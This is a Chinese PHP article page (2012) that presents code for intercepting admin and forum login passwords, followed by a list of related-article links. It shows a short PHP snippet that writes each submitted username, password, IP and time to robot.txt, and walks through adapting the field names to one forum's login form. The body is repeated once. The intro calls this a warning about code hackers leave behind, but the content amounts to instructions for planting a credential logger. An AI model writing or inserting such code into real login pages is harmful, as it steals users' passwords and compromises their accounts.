php截取后臺(tái)登陸密碼的代碼
更新時(shí)間:2012年05月05日 01:24:13 作者:
php截取后臺(tái)登陸密碼的代碼,很多時(shí)候黑客留了這樣的代碼,大家一定要注意下
if($_POST[loginsubmit]!=){ //判斷是否點(diǎn)了登陸按鈕
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結(jié)果寫入一個(gè)文件
下面簡(jiǎn)單分析一下,以華夏的登陸頁(yè)面為例。打開bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復(fù)制了關(guān)鍵代碼過來.
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表單提交的地址,里面會(huì)處理登陸,比如判斷密碼是不是正確什么的 method為POST,所以用$_POST接收。
。。。。強(qiáng)大的省略號(hào)。。。。。。
<TR>
<TD height=40>賬號(hào)(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結(jié)果寫入一個(gè)文件
下面簡(jiǎn)單分析一下,以華夏的登陸頁(yè)面為例。打開bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。
我只復(fù)制了關(guān)鍵代碼過來.
<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action后面的值即是表單提交的地址,里面會(huì)處理登陸,比如判斷密碼是不是正確什么的 method為POST,所以用$_POST接收。
。。。。強(qiáng)大的省略號(hào)。。。。。。
<TR>
<TD height=40>賬號(hào)(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwuser]
<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這里面的對(duì)應(yīng), 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]
您可能感興趣的文章:
- php下使用curl模擬用戶登陸的代碼
- PHP+MYSQL會(huì)員系統(tǒng)的登陸即權(quán)限判斷實(shí)現(xiàn)代碼
- php中通過curl模擬登陸discuz論壇的實(shí)現(xiàn)代碼
- 一個(gè)簡(jiǎn)單的網(wǎng)頁(yè)密碼登陸php代碼
- 解析如何修改phpmyadmin中的默認(rèn)登陸超時(shí)時(shí)間
- PHP登陸后跳轉(zhuǎn)到登陸前頁(yè)面實(shí)現(xiàn)思路及代碼
- php中session退出登陸問題
- PHP函數(shù)分享之curl方式取得數(shù)據(jù)、模擬登陸、POST數(shù)據(jù)
- php+mysql實(shí)現(xiàn)用戶注冊(cè)登陸的方法
- php中的登陸login實(shí)例代碼
相關(guān)文章
php類自動(dòng)加載失敗的處理方案及實(shí)例代碼
在本篇文章里小編給大家整理了一篇關(guān)于php類自動(dòng)加載失敗的處理方案及實(shí)例代碼,有興趣的朋友們可以學(xué)習(xí)參考下。2021-09-09
PHP獲取指定時(shí)間段之間的 年,月,天,時(shí),分,秒
前端傳倆個(gè)標(biāo)準(zhǔn)的 時(shí)間格式過來,格式像2009-05-12 12:12:30,然后根據(jù)需要返回這個(gè)時(shí)間段的不同單位的表示,對(duì)于時(shí)間格式的校驗(yàn)我這里代碼沒貼出來,所以用的時(shí)候自己考慮加上2016-06-06
php5.4以下版本json不支持不轉(zhuǎn)義內(nèi)容中文的解決方法
這篇文章主要介紹了php5.4以下版本json不支持不轉(zhuǎn)義內(nèi)容中文的解決方法,通過一個(gè)自定義php方法實(shí)現(xiàn)模擬joson中文不轉(zhuǎn)義,具有一定參考借鑒價(jià)值,需要的朋友可以參考下2015-01-01
PHP的autoload自動(dòng)加載機(jī)制使用說明
自PHP5后,引入了__autoload這個(gè)攔截器方法,可以自動(dòng)對(duì)class文件進(jìn)行包含引用,下面看具體的使用方法。2010-12-12
按上下級(jí)層次關(guān)系輸出內(nèi)容的PHP代碼
php下按上下級(jí)層次關(guān)系輸出內(nèi)容,需要的朋友可以參考下。2010-07-07
php策略模式簡(jiǎn)單示例分析【區(qū)別于工廠模式】
這篇文章主要介紹了php策略模式,對(duì)比工廠模式簡(jiǎn)單分析了php策略模式的原理與使用方法,需要的朋友可以參考下2019-09-09
php實(shí)現(xiàn)mysql備份恢復(fù)分卷處理的方法
這篇文章主要介紹了php實(shí)現(xiàn)mysql備份恢復(fù)分卷處理的方法,包括完整的MySQL備份恢復(fù)類文件及用法實(shí)例,注釋包含了詳盡的用法說明,是非常實(shí)用的技巧,需要的朋友可以參考下2014-12-12

